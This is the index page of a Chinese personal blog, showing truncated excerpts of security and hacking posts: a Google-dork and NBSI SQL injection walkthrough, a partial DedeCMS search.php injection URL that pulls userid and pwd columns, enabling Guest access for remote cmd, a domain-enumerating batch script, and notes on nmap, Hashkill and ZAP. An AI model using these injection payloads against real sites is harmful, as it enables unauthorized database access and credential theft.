小马博客

一个无聊的人,一个无聊的博客

看见最近大家讨论远程调用cmd比较热,所以就想写一下自己使用远程调用CMD的一些小结 主要细节请参考 http://lcx.cc/?i=3221 我以windows 2003系统做演示. 1.激活本地Guest账号 2.在组策略中将 网络访问: 本地帐户的共享和安全模型 改...

发布 0 条评论

nmap是一款用于网络发现(Network Discovery)和安全审计(Security Auditing)的网络安全工具,它是自由软件。软件名字Nmap是Network Mapper的简称。通常情况下,Nmap用于:   列举网络主机清单 管理服务升级调度 监控主机 ...

发布 0 条评论

作者:qingran 作者网站:www.qingran.me 首先百度搜索关键字:inurl: (mmdatabase.asp) 我随便列举一个:   www.xxxx.com 修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1 扔入NBSI 或者啊D等各种...

发布 1 条评论

首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32...

发布 1 条评论

[php] 打包程序: <% 'On Error Resume Next '容错处理 Server.ScriptTimeOut = 300 '定义脚本超时时间 Dim Fso, Rs, Conn, Stream, AdoCataLog '定义用到的组件 Set Fso = Server.CreateObject("Scripting.FileSystemObject&...

发布 0 条评论

@echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成 功" /v ^|find "The command completed successfully." /v ^|find "命...

发布 0 条评论

在实际工作中我们经常会用到对身份证进行验证的操作,比如员工档案中身份信息的管理等等。长达18位的数字谁也不敢说每次都能绝对的输入正确,如果能对输入的身份证进行一下验证的话,会最大限度的保证资料的正确性。 接着我们来说说18...

发布 0 条评论

Hashkill是一个开放源代码的Linux下的hash密码破解工具,它使用了OpenSSL,目前支持4种破解方法(字典、蛮力、混合、markov)和31种不同类型hash的插件(md5, sha1, phpbb3, mysql, md5 (unix), des(unix), sha(unix), vbulletin, smf等)...

发布 0 条评论

程序下载地址:https://code.google.com/p/zaproxy/downloads/list 扩展下载地址:https://code.google.com/p/zap-extensions/downloads/list 更新内容: 1、集成附加组件 2、重写标准爬虫 3、使用新的ajax爬虫 4、支持websockets 5...

发布 0 条评论